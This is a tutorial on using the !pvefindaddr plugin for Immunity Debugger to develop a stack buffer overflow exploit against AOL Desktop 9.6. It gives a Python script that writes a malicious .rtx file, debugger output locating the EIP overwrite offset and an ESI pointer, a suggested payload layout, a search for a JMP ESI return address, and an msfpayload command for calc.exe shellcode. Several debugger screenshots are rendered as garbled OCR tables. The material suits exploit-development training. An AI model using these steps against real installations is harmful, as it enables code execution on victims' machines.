# Exploit Writing Made Easier With !pvefindaddr

A few notes before we begin, covering what this paper is about and what it isn't about:

1. This paper is intended to demonstrate the efficiency of !pvefindaddr.

2. This paper will not explain the exploit till the end, if you want the full exploit go here: <u>http://</u><u>www.exploit-db.com/exploits/16107/</u>

Now let's start!

# Required software: Immunity Debugger

<u>Ipvefindaddr</u> AOL Desktop v9.6

## Required knowledge:

Understanding how buffer overflows work. Exploiting techniques. A programming language (I use python).

I've heard a lot of people complaining about how many apps they must use when writing exploits, or how time consuming some tasks can be if they are not automated or when trying to test multiple dll's for SAFESEH or ASLR, that's where !pvefindaddr comes in.

## What is !pvefindaddr !?

Well in short terms !pvefindaddr is a PyCommand for Immunity Debugger made by <u>corelanc0d3r</u> which can do almost everything (if not everything) that you would need when building an exploit.

Here is some helpful information on how to install !pvefindaddr and some basic usage

## Ok, let us get started !

Install AOL Desktop v9.6 (A quick note here, if the app doesn't work properly in Immunity Debugger you will have to close the debugger, issue CTRL+ALT+DELETE -> Processes and stop all AOL related processes then run the app).

Now let's make the exploit skeleton (I won't remake the full exploit, if you want to check it out it's on the top of the page), it will contain two standard headers and between them our buffer, let's check it out:

#### \*\*\*\*\*

## #!/usr/bin/python

# The First Header

hd1 = ("\x3c\x48\x54\x4d\x4c\x3e\x3c\x46\x4f\x4e\x54\x20\x20\x53\x49\x5a" "\x45\x3d\x32\x20\x50\x54\x53\x49\x5a\x45\x3d\x31\x30\x20\x46\x41" "\x4d\x49\x4c\x59\x3d\x22\x53\x41\x4e\x53\x53\x45\x52\x49\x46\x22" "\x20\x46\x41\x43\x45\x3d\x22\x41\x72\x69\x61\x6c\x22\x20\x4c\x41" "\x4e\x47\x3d\x22\x30\x22\x3e\x3c\x41\x20\x48\x52\x45\x46\x3d\x22" "\x68\x74\x74\x70\x3a\x2f\x2f")

# The Second Header hd2 = ("\x22\x3e\x74\x65\x73\x74\x3c\x2f\x41\x3e\x3c\x55\x3e\x3c\x42\x52" "\x3e\x0d\x0a\x3c\x2f\x55\x3e\x3c\x2f\x46\x4f\x4e\x54\x3e\x3c\x2f" "\x48\x54\x4d\x4c\x3e\x0d\x0a")

payload='\x90'\* 6000

exploit = hd1+payload+hd2

try:

file=open('exploit.rtx','w') file.write(exploit) file.close() print 'File created, time to PEW PEW!\n' except: print 'Something went wrong!\n' print 'Check if you have permisions to write in that folder, of if the folder exists!'

```
*****
```

Generate the file using the exploit and after that open it in AOL Desktop and as we can see we could overwrite EIP with our '\x90"s:

| Reg                                                  | isters (FPU)                                                                                                    | <              | <    | < | < | < | < | < | < | < | < · |
|------------------------------------------------------|----------------------------------------------------------------------------------------------------|----------------|------|---|---|---|---|---|---|---|-----|
| EAX<br>ECX<br>EDX<br>EBX<br>EBP<br>ESI<br>EDI        | 0000000<br>0000000<br>0000000<br>02D6F550<br>0022E750<br>0022E750<br>0022E780<br>0022E7280<br>0022E724                                                                                                    |                |      |   |   |   |   |   |   |   |     |
| EIP                                                  | 90909090                                                                                                    |                |      |   |   |   |   |   |   |   |     |
| 010 <mark>01</mark> 000<br>CPANSTDO                  | ES 0023 32bit 0(FFFFFFF)<br>CS 0018 32bit 0(FFFFFFFF)<br>SS 0023 32bit 0(FFFFFFFF)<br>DS 0023 32bit 0(FFFFFFF)<br>FS 0038 32bit 7FFDD000(FFF)<br>GS 0000 NULL<br>LastErr ERROR_SUCCESS (00000000)                                                                                                |                |      |   |   |   |   |   |   |   |     |
| EFL                                                  | 00210286 (NO,NB,NE,A,S,PE,L,LE)                                                                                                    |                |      |   |   |   |   |   |   |   |     |
| STØ<br>ST1<br>ST2<br>ST3<br>ST4<br>ST5<br>ST6<br>ST7 | empty 7.0641610228386886000e-304<br>empty -1.#0NPN0000000000000<br>empty 2.8480928005503184000e-304<br>empty 3.5016502293827894000e-306<br>empty 3.2378592100266092000e-319<br>empty 0.0000000000000000<br>empty 1.968750000000000000<br>empty 1.2519775166695107000e-312<br>3 2 1 0 E S P U 0 7 | 2 D I          |      |   |   |   |   |   |   |   |     |
| FST<br>FCW                                           | 4000 Cond 1 0 0 0 Err 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0                                                                                                    | 9 0 0<br>1 1 1 | (EQ) |   |   |   |   |   |   |   |     |
|                                                      |                                                                                                    |                |      |   |   |   |   |   |   |   |     |

# So what would be next ? Calculating the exact offset until EIP overwrite.

(NOTE: Before we go on, restart AOL and attach it again).

In our debugger we can either click on the PyCommands button and select from the list ! pvefindadrr and then enter the arguments or we can do this directly by entering !pvefindaddr and the arguments in the command bar at the bottom of the debugger like this:

| 11    | Address                    | Hex d | ump       |          |          |          |          |          | ASC   | II  |    |  |
|-------|----------------------------|-------|-----------|----------|----------|----------|----------|----------|-------|-----|----|--|
|       | 00403000                   | A2 D8 | <u>88</u> | 8F       | 50       | 27       | 75       | 70       | ó†è   | A]' | uр |  |
|       | 00403008                   |       | 누ト        | 타        | FF<br>01 | FF<br>ØØ | FF<br>ØØ | FF<br>ØØ | -     | ø   |    |  |
|       | 00403018                   | 60 60 | юø        | юø       | ŏi       | йö       | йŏ       | йŏ       | Ξ     | .ö. |    |  |
|       | 00403020                   | 8F 04 | 86        | 7Č       | 00       | 00       | 00       | 00       | A+a   | 1   |    |  |
|       | 00403028                   | 00 00 | 00        | 00       | Ø1       | 00       | 00       | 00       | •••   | ·8. |    |  |
|       | 00403038                   | 21 AC | 92        | 7C       | ЙЙ       | 00       | 00       | 00       | †%Æ   |     |    |  |
|       | 00403040                   | 00 00 | 00        | 00       | 00       | 00       | 00       | 00       |       |     |    |  |
|       | 00403048                   | 00 00 | 00        | 99       | 01       | 90       | 00       | 00       |       | ·9, | ÷. |  |
|       | 00403050                   | 00 20 | 40<br>ØØ  | øø<br>ØØ | иά       | ас<br>ØØ | 40<br>ØØ | øø       |       | .a. |    |  |
|       | 00403060                   | 00 00 | 00        | 00       | 00       | 00       | 00       | 00       |       |     |    |  |
|       | 00403068                   | 00 00 | 00        | 00       | 00       | 00       | 00       | 00       | • • • | ••• |    |  |
|       | 00403070                   | 00 00 | юю<br>ЙЙ  | 00<br>ØØ | ØØ       | иø<br>Ий | ØØ       | иo<br>Иu |       | ::: | :: |  |
| L l'i |                            |       |           |          |          |          |          |          |       | _   |    |  |
|       | !pvefind                   | addr  | pat       | ter      | n_(      | cre      | ate      | 60       | 100   |     |    |  |
|       | -                          | -     | -         | _        |          |          | _        |          |       | _   | _  |  |
|       | Done - check mspattern.txt |       |           |          |          |          |          |          |       |     |    |  |

As you can see it said "check mspattern.txt" so we go in the Immunity Debugger folder and open up mspatters.txt, copy the pattern in our exploit and regenerate the malicious file.

After opening the malicious file containing our pattern:

| EIP 35784734<br>C 0 ES 0023 32bit 0(FFFFFFF)<br>P 1 CS 001B 32bit 0(FFFFFFF)<br>A 0 SS 0023 32bit 0(FFFFFFF)<br>2 0 DS 0023 32bit 0(FFFFFFF)<br>5 0 FS 0038 32bit 7FFDE000(FFF)<br>7 0 GS 0000 NULL<br>D 0<br>0 0 LastErr ERROR_SUCCESS (00000000)<br>EFL 00210206 (NO,NB,NE,A,NS,PE,GE,G)<br>ST0 empty 7.064161022838686000e-304<br>ST1 empty -1.#CNAN0000000000000<br>ST2 empty 2.8480928005503184000e-304<br>ST3 empty 3.5016502293827894000e-306<br>ST4 empty 3.5016502293827894000e-319<br>ST5 empty 0.0000000000000000<br>ST6 empty 1.2519775166695107000e-312<br>3 2 1 0 E S P U O Z D I<br>FST 4000 Cond 1 0 0 0 Err 0 0 0 0 0 0 0 (EQ)<br>FCW 027F Prec NEAR,53 Mask 1 1 1 1 1                                                                                                    | EAX<br>ECX<br>EDX<br>EBX<br>EBP<br>EBP<br>ESI<br>EDI               | 00000000<br>00000000<br>0206F590<br>0022E760<br>0022E780<br>02DR3960<br>0022E774                                | ASCII "w9Gx0Gx1Gx2Gx3Gx4Gx5Gx6Gx7Gx8Gx9Gy0Gy1Gy2Gy3Gy4Gy5Gy6Gy7Gy8Gy9Gz0Gz1Gz                                                                                                    |
|----------------------------------------------------------------------------------------------------|--------------------------------------------------------------------|----------------------------------------------------------------------------------------------------|----------------------------------------------------------------------------------------------------|
| C 0 ES 0023 32bit 0(FFFFFFF)<br>P 1 CS 001B 32bit 0(FFFFFFF)<br>2 0 DS 0023 32bit 0(FFFFFFF)<br>5 0 FS 003B 32bit 7FFDE000(FFF)<br>7 0 GS 0000 NULL<br>D 0<br>0 0 LastErr ERROR_SUCCESS (00000000)<br>EFL 00210206 (NO,NB,NE,A,NS,PE,GE,G)<br>ST0 empty 7.064161022838686000e-304<br>ST1 empty -1.#CNHAN00000000000e-304<br>ST2 empty 2.8480928005503184000e-304<br>ST3 empty 3.5016502293827894000e-306<br>ST4 empty 9.106502293827894000e-319<br>ST5 empty 0.000000000000000000<br>ST6 empty 1.963750000000000000<br>ST6 empty 1.963750000000000000<br>ST7 empty 1.2519775166695107000e-312<br>3 2 1 0 E S P U O Z D I<br>FST 4000 Cond 1 0 0 0 Err 0 0 0 0 0 0 0 (EQ)<br>FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1                                                                                                    | EIP                                                                | 35784734                                                                                                    |                                                                                                    |
| EFL 00210206 (NO,NB,NE,A,NS,PE,GE,G)<br>ST0 empty 7.0641610228386886000e-304<br>ST1 empty -1.#CNHAN00000000000000000<br>ST2 empty 2.8480928005503184000e-304<br>ST3 empty 3.5016502293827894000e-306<br>ST4 empty 3.2378592100206092000e-319<br>ST5 empty 0.000000000000000000<br>ST6 empty 1.968750000000000000<br>ST6 empty 1.968750000000000000<br>ST7 empty 1.2519775166695107000e-312<br>3 2 1 0 E S P U O Z D I<br>FST 4000 Cond 1 0 0 Err 0 0 0 0 0 0 0 (EQ)<br>FCW 027F Prec NEAR,53 Mask 1 1 1 1 1                                                                                                    | 01000000<br>CPAZSTD0                                               | ES 0023<br>CS 001B<br>SS 0023<br>DS 0023<br>FS 003B<br>GS 0000                                                  | 32bit 0(FFFFFFF)<br>32bit 0(FFFFFFF)<br>32bit 0(FFFFFFF)<br>32bit 0(FFFFFFF)<br>32bit 7FFDE000(FFF)<br>NULL                                                                                                    |
| EFL 00210206 (NU,NB,NE,H,NS,FE,GE,G)<br>ST0 empty 7.0641610228386886000000000<br>ST1 empty -1.#XNAN0000000000000<br>ST2 empty 2.8480928005503184000e-304<br>ST3 empty 3.5016502293827894000e-306<br>ST4 empty 3.2378592100206092000e-319<br>ST5 empty 0.000000000000000000<br>ST6 empty 1.9687500000000000000<br>ST6 empty 1.968750000000000000<br>ST7 empty 1.2519775166695107000e-312<br>3 2 1 0 E S P U O Z D I<br>ST 4000 Cond 1 0 0 0 Err 0 0 0 0 0 0 (EQ)<br>FCW 027F Prec NEAR,53 Mask 1 1 1 1 1                                                                                                    | 00                                                                 | Lasterr                                                                                                    |                                                                                                    |
| ST0 empty 7.0641610228386886000e-304<br>ST1 empty -1.#CNAN000000000000000<br>ST2 empty 2.8480928005503184000e-304<br>ST3 empty 3.5016502293827894000e-306<br>ST4 empty 3.2378592100206092000e-319<br>ST5 empty 0.00000000000000000<br>ST6 empty 1.9687500000000000000<br>ST7 empty 1.2519775166695107000e-312<br>ST7 empty 1.2519775166695107000e-312<br>ST7 empty 1.251977516695107000e-312<br>ST7 empty 1.251977516695107000e-312<br>ST7 empty 1.251977516695107000e-312<br>ST7 empty 1.251977516695107000e-312<br>ST7 empty 1.251977516695107000e-312<br>ST7 empty 1.251977516695107000e-312<br>ST7 empty 1.251977516695107000e-312<br>ST7 empty 1.251977516695107000e-312<br>ST7 empty 1.251977516695107000e-312<br>ST7 empty 1.25197751000000000000000000000000000000000 | EFL                                                                | 00210206                                                                                                    | (NO,NB,NE,H,NS,PE,GE,G)                                                                                                    |
|                                                                                                    | STØ<br>ST1<br>ST2<br>ST3<br>ST4<br>ST5<br>ST6<br>ST7<br>FST<br>FCW | empty 7.8<br>empty -1.<br>empty 3.5<br>empty 3.5<br>empty 3.2<br>empty 1.9<br>empty 1.2<br>4000 Con<br>027F Pre | 641610228386886000e-304<br>#CNLN000000000000000<br>480928005883184000e-304<br>016502293827894000e-306<br>378592100206092000e-319<br>0000000000000000000<br>687500000000000000<br>5197751666595107000e-312<br>3 2 1 0 E S P U O Z D I<br>3 2 1 0 E S P U O Z D I<br>d 1 0 0 0 Err 0 0 0 0 0 0 0 (EQ)<br>c NEAR,53 Mask 1 1 1 1 1 |
|                                                                                                    |                                                                    |                                                                                                    |                                                                                                    |

We can see that our EIP is 35784734 and we also can see that ESI points in our buffer, now in order to determine the exact offset we will use another feature from !pvefindaddr. Normally with metasploit we would try pattern\_offset EIP now, well with !pvefindaddr we can actually get more info, let's try the findmsp function.

| !pvefindaddr findmsp |  |
|----------------------|--|
| Done                 |  |

After it is done just open the Log Windows and as we can see, we have some nice information:

| 35784734             | [17:16:50] Access violation when executing [35784734]                           |  |  |  |  |  |  |  |  |
|----------------------|---------------------------------------------------------------------------------|--|--|--|--|--|--|--|--|
| ØBADFØØD             |                                                                                 |  |  |  |  |  |  |  |  |
| ØBADFØØD             |                                                                                 |  |  |  |  |  |  |  |  |
| ØBADFØØD             |                                                                                 |  |  |  |  |  |  |  |  |
| ØBADFØØD             |                                                                                 |  |  |  |  |  |  |  |  |
| ØBADFØØD             | Searching for metasploit pattern references                                     |  |  |  |  |  |  |  |  |
| ØBADFØØD             |                                                                                 |  |  |  |  |  |  |  |  |
| ØBADFØØD             | [1] Searching for first 8 characters of Metasploit pattern : Aa0Aa1Aa           |  |  |  |  |  |  |  |  |
| UBHDFUUD             |                                                                                 |  |  |  |  |  |  |  |  |
| 75F70000             | Modules C: NWINDOWSNSystem32Ndavoint.dll                                        |  |  |  |  |  |  |  |  |
| 02E4D438             | - Found begin of Hetasploit pattern at 0x02e40438                               |  |  |  |  |  |  |  |  |
| 02E40B67             | - Found begin of Hetaspioit pattern at 0x02e40067                               |  |  |  |  |  |  |  |  |
| 02E4400F             | - Found begin of Hetasploit pattern at 0x02e44004                               |  |  |  |  |  |  |  |  |
| 020H2730             | - Found begin of Hetaspiolt pattern at 0x02d2/30                                |  |  |  |  |  |  |  |  |
| 020F5HE7             | - Found begin of Hetaspiolt pattern at 0x02dfaer                                |  |  |  |  |  |  |  |  |
| 020F0H70<br>02520075 | - Found begin of Netasploit pattern at 0x02070aro                               |  |  |  |  |  |  |  |  |
| 02E2H07F             | - Found begin of newasplott pattern at exezeaerr                                |  |  |  |  |  |  |  |  |
| 00HDF00D             | ** Could not find begin of Matagalait pattern (unicode ourseded) in memory * ** |  |  |  |  |  |  |  |  |
| 00HDF00D<br>080NF00N | ** Could not find begin of netaspioit pattern (unicode expanded) in memory : ** |  |  |  |  |  |  |  |  |
| ABONFAAN             | [2] Checking register addresses and contents                                    |  |  |  |  |  |  |  |  |
| ØBADFØØD             |                                                                                 |  |  |  |  |  |  |  |  |
| <b>ØBANFØØN</b>      | - Register FIP is overwritten with Metasploit pattern at position 5384          |  |  |  |  |  |  |  |  |
| ØBADFØØD             | - Register ESI points to Metasploit pattern at position 5368                    |  |  |  |  |  |  |  |  |
| ØBADFØØD             |                                                                                 |  |  |  |  |  |  |  |  |
| ØBADFØØD             | [3] Walking seh chain                                                           |  |  |  |  |  |  |  |  |
| ØBADFØØD             |                                                                                 |  |  |  |  |  |  |  |  |
| ØBADFØØD             | <ul> <li>Checking seh chain entry at 0x0022f3e0, value 7e44048f</li> </ul>      |  |  |  |  |  |  |  |  |
| ØBADFØØD             | <ul> <li>Checking seh chain entry at 0x0022f440, value 7e44048f</li> </ul>      |  |  |  |  |  |  |  |  |
| ØBADFØØD             | – Checking seh chain entry at 0x0022fad8, value 0052d834                        |  |  |  |  |  |  |  |  |
| ØBADFØØD             | – Checking seh chain entry at 0x0022ffb0, value 00401d85                        |  |  |  |  |  |  |  |  |
| ØBADFØØD             | - <u>Checking seh chain entry at 0x0022ffe0</u> , value 7c839aa8                |  |  |  |  |  |  |  |  |
| ØBADFØØD             | Evaluated 5 SEH entries                                                         |  |  |  |  |  |  |  |  |
| UBHDFUUD             |                                                                                 |  |  |  |  |  |  |  |  |
| OBHDFOOD             | L4J Walking stack                                                               |  |  |  |  |  |  |  |  |
| 0BHDF00D             |                                                                                 |  |  |  |  |  |  |  |  |
| 0BHDF00D             | - ESP+000000BC Contains pointer (0x02da3838) to pattern at position 4360        |  |  |  |  |  |  |  |  |
| BEHDF BBD            |                                                                                 |  |  |  |  |  |  |  |  |
| !p∨efind             | pvefindaddr findmsp                                                             |  |  |  |  |  |  |  |  |
| Done                 |                                                                                 |  |  |  |  |  |  |  |  |

So it found the first characters from the patters in davcInt.dll then it checked register addresses, we have the EIP overwite address beginning at 5384 and the register who points in to the pattern with the instruction CALL DWORD[ESI+10] (if you check) at 5368 it even checked the SEH chains to see if it finds the pattern there and we also have the "Walking stack" which if you haven't guessed by now it actually tells us when the ESP contains a pointer to our buffer at the position 4360.

This is a nice feature but we have one that does even better, !pvefindaddr also has a function that runs a findmsp and after that based on the results and on the stack it acutally gives us information about the type of exploit and how it should be made, let's check it out.

!pvefindaddr suggest

metasploit pattern reference [1] Searching for first 8 characters of Metasploit pattern : Aa0Aa1Aa Metasploit pattern at 0x02e4d43 Metasploit pattern at 0x02e40b6 begin of Found egin begin of begin of begin of Metasploit pattern at 0x02e44004 Metasploit pattern at 0x02da2730 Found Found Found Metasploit pattern at 0x02df5 of pattern bund at egin of Metasploit pattern DS AC Found begin \*\* Could not find begin of Metasploit pattern (unicode expanded) in memory ! \*\* [2] Checking register addresses and contents Register EIP is overwritten with Metasploit pattern at position 5384
 Register ESI points to Metasploit pattern at position 5368 [3] Walking seh chain 0x0022f3e0, value 7e44048f 0x0022f440, value 7e44048f 0x0022f448, value 7e44048f Checking seh chain entry at Checking set chain entry at
 Checking set chain entry at
 Checking set chain entry at
 Checking set chain entry at 0x0022ffb0. value Evaluated 5 SEH entries IDFØØD - ESP+000000BC contains pointer (0x02da3838) to pattern at position 4360 Exploit payload information and suggestions : [+] Type of exploit : Direct RET overwrite (EIP is overwritten) Offset to direct RET : 5384 [+] Payload found at ESI Offset to register : 5368 [+] Payload suggestion (perl) : my \$junk="\x41" x 5368; my \$shellcode="(your shellcode here, max 12 bytes)"; my \$morejunk="\x90" x (12-length(\$shellcode)); my \$ret = XXXXXXXX; #jump to ESI - run \*pvefindaddr j -r ESI -n to find an address my \$payload = \$junk.\$shellcode.\$morejunk.\$ret; [+] Bead more about this type of exploit at f exploit at index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflow of lpvefindaddr suggest

#### Done

#### Sweet huh ?

Now we have the exact offset before the EIP overwrite, we know that ESI points to our buffer the next normal step would be to get the value of ESI into EIP with a JMP ESI, CALL ESI, etc. now these are simple instructions we can find them but what if we want to find these instructions without null bytes, from specific modules, etc. (NOTE: I'm not saying this can't be done manual, only saying that it will take more time and this way it's much easier).

Let's say we want to make this exploit using an universal address (like the original exploit), searching for this instruction can take a lot of time, mostly because it's a very common instruction, but using !pvefindaddr we can actually search for every JMP ESI instruction from some specific modules and some specific chatacteristics.

We will use !pvefindaddr to give us a list of all modules and their characteristics, once we have done this we can view all the modules that the app uses and see which have SAFESEH, ASLR, etc.:

| L Log d              | ata       |                                         |                                         |                                         |             |       |            |          |                                                                                                    |
|----------------------|-----------|-----------------------------------------|-----------------------------------------|-----------------------------------------|-------------|-------|------------|----------|----------------------------------------------------------------------------------------------------|
| Address              | Message   |                                         |                                         |                                         |             |       |            |          |                                                                                                    |
|                      | No Fall ( |                                         | and the second                          | d made to the Co                        |             |       |            |          |                                                                                                    |
| ØBADFØØD             | ** [+] 8  | Finished task.                          | 155 modules f                           | ound                                    | , prease w  | att   |            |          |                                                                                                    |
| ØBADFØØD             |           |                                         |                                         |                                         |             |       |            |          |                                                                                                    |
| 0BHDF00D             | Loaded    | modules                                 |                                         |                                         |             |       |            |          |                                                                                                    |
| ØBADFØØD             | Fisup     | l Base                                  | 1 Top                                   | l Size                                  | SafeSEH     | ASLR  | 1 NXCompat | 1 OS D11 | ! Version, Modulename & Path                                                                                                    |
| 0BHDF00D<br>0BADF00D | NO        | : 0x763B0000                            | : 0x763E9000                            | : 0×00049000                            | l ues       | : NO  | ! NO       | ! ues    | 1 6.00.2900.5512 - COMDL632.dll : C:\WINDOWS\system32\COMDL632.dll                                                                                                    |
| ØBADFØØD             | NÖ        | 0x72280000                              | 0x72285000                              | 0x00005000                              | yes .       |       |            | yes .    | ; 5.1.2600.5512 - sensapi.dll : C:\WINDOWS\system32\sensapi.dll                                                                                                    |
| ØBADFØØD             | NO        | 0x635C0000                              | 0x635C7000                              | 0x00007000                              | yes         | NO    | I NO       | i NO     | 1 9.06.002 - APPDATA.dll : C:\Program_Files\AOL_Desktop_9.6\APPDATA.dll                                                                                                    |
| ØBADFØØD             | NO        | 0x74980000                              | 0x74AA3000                              | 0x00123000                              | yes         | NO    | NO         | yes      | 18.100.1052.0 - msxml3.dll : C:\WINDDWS\system32\msxml3.dll                                                                                                    |
| 0BHDF00D             | NO        | i 0x72020000                            | i 0872029000                            | 1 0x00009000                            | yes         | i NU  | i NO       | yes      | ; 5.1.2600,5512 - Wamaud.drv : C:NWINDUWSNsystema2Nwamaud.arv                                                                                                    |
| 0DHDF00D             | NO        | 1 0076520000                            | 007654547000                            | 000000000000000000000000000000000000000 | yes         | 1 NO  | NO NO      | yes      | - 5.1.2000.5512 - EINKINFO.UTT ; C; WUNDOWSSYSTEMSZNEINKINFO.UTT                                                                                                    |
| <b>ABADEAAD</b>      | NÖ        | 1 0x70810000                            | : 0x70B9C000                            | 0x00021000                              | yes<br>ups  | NŐ    | NŐ         | ues .    | 5.1.2600.5512 - WZCSuc.DIT : C:NWINDOWSSystem32NZCSuc.DIT                                                                                                    |
| ØBADFØØD             | NÖ        | 0x15800000                              | 0x15834000                              | 0x00034000                              | i Nõ        | i NÕ  | NŎ         | ŇÔ       | 3.2.2.26 - ComponentMar.dll : C:\Program Files\Uiewpoint\Uiewpoint Experience Technology\                                                                                                    |
| ØBADFØØD             | yes       | 0x07330000                              | 1 0x07359000                            | 0x00029000                              | yes .       | yes   | yes        | yes      | ; 3.10.349.0 - msls31.dll : C:\WINDOWS\system32\msls31.dll                                                                                                    |
| ØBADFØØD             | NO        | 0x42120000                              | 0x42131000                              | 0x00011000                              | yes         | NO    | I NO       | yes      | 6.00.3800.5512 - twext.dll : C:\WINDOWS\system32\twext.dll                                                                                                    |
| ØBADFØØD             | NO        | 0x478C0000                              | 0x478CA000                              | 0x000000000                             | yes         | NO    | NO         | yes      | 5.1.2600.5512 - dot3api.dll : C:\WINDOWS\system32\dot3api.dll                                                                                                    |
| 0BHDF00D             | NO        | 1 0X76600000                            | : 0X7661D000                            | 1 0X00010000                            | yes         | i 110 | i NO       | yes No   | ( S.1.2600.SS12 - CSCDEL.dlf : C:NUTNOUWS/SS950032CSCDEL.dlf                                                                                                    |
| 00000000             | NO        | 000000000000000000000000000000000000000 | 000000000000000000000000000000000000000 | 000000000000000000000000000000000000000 | yes .       | 1 NO  | I NO       | 1 10     | 1 9.06.002 - Himitolew.tol : C:NFrogram FilesNot Desktop 9.6NooleNithiolew.tol                                                                                                    |
| 0BADF00D             | NO        | 1 0x00H00000                            | ! 0v40225000                            | 1 0x00015000                            | yes<br>ups  | NO NO | NO         | NO       | 1 5.00.000 - Fronging Catt - Configuration of the state of the state o |
| ØBADFØØD             | NŎ        | 0x3DFD0000                              | 0x3E1B9000                              | 0x001E9000                              | ves         | ves   | ves        | ves      | 8.00.6001.23084 - iertutil.dll : C:\WINDOWS\system32\iertutil.dll                                                                                                    |
| ØBADFØØD             | NÖ        | 0x67F00000                              | 1 0x67F06000                            | 0x00006000                              | yes .       |       |            |          | 9.06.002 - idleproc.dll : C:\Program Files\AOL Desktop 9.6\idleproc.dll                                                                                                    |
| ØBADFØØD             | NO        | 0x6A900000                              | 0x6A965000                              | 0x00065000                              | yes         | I NO  | I NO       | NO NO    | 1 9.06.002 - chat.tol : C:NProgram FilesNAOL Desktop 9.6NTOOLNchat.tol                                                                                                    |
| ØBADFØØD             | NO        | 0x774E0000                              | 0x7761E000                              | 0x0013E000                              | yes         | NO    | NO         | yes      | 5.1.2600.6010 - ole32.dll : C:\WINDOWS\system32\ole32.dll                                                                                                    |
| 0BHDF00D             | NO        | i 0X77F60000                            | 1 0X77FD6000                            | 000076000                               | i yes       | i NU  | i NO       | yes No   | ; 6.00.2900.5912 - SHEWHPI.dll; C:NWINDOWS/Systems2/SHEWHPI.dll                                                                                                    |
| 0DHDF00D             | NO        | 1 0x00040000                            | 1 0x000700000                           | 000000000000000000000000000000000000000 | 1 10        | 1 NO  | NO         | 110      | 1 540.002 - Sec. Col : C: SFOGRAM FILES SHOL DESKTOD S.CSTODE SEC. COL                                                                                                    |
| <b>ABADEAAD</b>      | NŐ        | 1 0×68060000                            | 1 0x68C80000                            | 0x0000010000                            | ups -       | NO NO | NŐ         | ŇŐ       | 9.46.402 - uuutol : C:Nrogram Files S01 Destro 9.65.101.uuutol                                                                                                    |
| ØBADFØØD             | NÖ        | 0x71B20000                              | 0x71B32000                              | 0x00012000                              | ves         | i NÕ  | NŐ         | yes      | 5.1.2600.5512 - MPR.dll : C:\WINDOWS\system32\MPR.dll                                                                                                    |
| ØBADFØØD             | NO        | 0x754D0000                              | 1 0x75550000                            | 0x00080000                              | l yes       |       |            | l yes    | ; 5.131.2600.5512 - CRYPTUI.dll : C:\WINDOWS\system32\CRYPTUI.dll                                                                                                    |
| ØBADFØØD             | NO        | 0x76C30000                              | 0x76C5E000                              | 0x0002E000                              | yes         | NO    | I NO       | yes      | : 5.131.2600.5922 - WINTRUST.dll : C:\WINDOWS∖system32\WINTRUST.dll                                                                                                    |
| ØBADFØØD             | NO        | 0x77000000                              | 0x77D33000                              | 0x00033000                              | yes         | I NO  | NO         | yes      | 5.1.2600.5512 - netman.dll: C:NWINDDWS\system32\netman.dll                                                                                                    |
| 0BHDF00D             | NO        | i 0260430000                            | i 026043H000                            | 00000000000                             | yes .       | i 110 | i NO       | yes      | ; 5.03.2500.5512 - GOTAWEX.GLL ; U:NWINDUWSNSUSTEMS2NGGTAWEX.GLL                                                                                                    |
| ABONEAAD             | NO        | 1 0071040000                            | 1 0v71D58000                            | 1 0x00010000                            | yes<br>luce | 1 NO  | NO NO      | yes use  | 0.00.2900.0010   OneLoc.011   0.00100005950000200020011                                                                                                    |
| ØBADFØØD             | NŎ        | 0x77820000                              | 1 0x77B32000                            | 0x00012000                              | ues         | NŎ    | NŎ         | ues      | 5.1.2600.5875 - MSBSN1.dll : C:\WINDOWS\system32\MSBSN1.dll                                                                                                    |
| ØBADFØØD             | NÖ        | 0x67180000                              | 0x6727D000                              | 0x000FD000                              | yes         | i NO  | i NÖ       | i ÑÕ     | ; 9.06.002 - manager.dll : C:∖Program Files∖AOL Desktop 9.6\manager.dll                                                                                                    |
| ØBADFØØD             | NO        | 0x77050000                              | 0x77115000                              | 0x000C5000                              | yes         | I NO  | I NO       | yes      | 2001.12.4414.700 - COMRes.dll : C:\WINDOWS\system32\COMRes.dll                                                                                                    |
| ØBADFØØD             | NO        | 0x76D60000                              | 0x76D79000                              | 0x00019000                              | yes         | NO    | NO         | yes      | 5.1.2600.5512 - iphlpapi.dll: C:\WINDOWS\system32\iphlpapi.dll                                                                                                    |
| 0BHDF00D             | NU        | 1 0x76B40000                            | 1 0x76B6D000                            | 0x00020000                              | yes         | I NU  | NU         | yes No   | ( 5.1.2600.5512 - WINMM.dll : C:NWINDOWS/System82/WINMM.dll                                                                                                    |
| 0BHDF00D             | NO        | 0x6F200000                              | 1 0x6F20F000                            | 000000000000000000000000000000000000000 | yes         | I NO  | I NO       | 110      | T 1.0.0.1 - actase.DLL : C:vrogram FilesNDL Desktop 9.6\actBase.DLL                                                                                                    |
| <b>ABADEAAD</b>      | NO        | 2 0x50C00000                            | 1 0x50C0E000                            | 0x00022000                              | yes         | NO -  | NO         | yes      | 5.1.2609.5512 - eponexy.dll : C:NHINDOWSSystem32/eponexy.dll                                                                                                    |
| ÖBADFÖÖD             | NÖ        | 0x74580000                              | 0x74502000                              | 0x00022000                              | l ves       | i Nõ  | I NŐ       | yes.     | 5.1.2600.5512 - eappofs.dll : C:\WINDOWS\system32\eappofs.dll                                                                                                    |
| ØBADFØØD             |           | 0x6C000000                              | 1 0x6C093000                            | 0x00093000                              | yes .       |       |            | I NO     | : 16.4.6.1 - AOLSvoMgr.dll : C:\Program Files\Common Files\AOL\1296986978\ee\AOLSvoMgr.dll                                                                                                    |
| ØBADFØØD             | NO        | : 0x60580000                            | 1 0x6062B000                            | 1 0x000AB000                            | 1 NO        | I NO  | I NO       | I NO     | : 9.06.002 — supersub.dll : C:\Program Files\AOL Desktop 9.6\supersub.dll                                                                                                    |
| Invefinda            | nm nhhe   | dules                                   |                                         |                                         |             |       |            |          |                                                                                                    |
|                      |           |                                         |                                         |                                         |             |       |            |          |                                                                                                    |

Once we can see which modules we can use we can start searching for the specific instruction using the command:

```
!pvefindaddr j -r ESI -n -o (this might take some time, go get a beer or something.)
```

This function searches for pointers that jump to a specific register (ESI in our case), the most common use of this function is when dealing with direct EIP overwrite. The function will look for any instructions like JMP ESI, CALL ESI combination from non-fixup and non-aslr modules also the -n flag will not show pointers that contain null bytes and the -o flag will exclude the pointers in the OS modules (We want to make it universal).

After a little search we find a nice intruction at 20C5CFC0 from aolusershell.dll, this one should work perfect.

After we are done we can also use compare to check in order to compare some bytes (usually our shellcode) from a file with some bytes in memory it also compares unicode expanded instances, ok now we need to make our shellcode binary (only the shellcode), we can just give the RAW output at Metasploit when making a payload and pipe it to a file like:

msfpayload windows/exec CMD=calc.exe R > shellcode

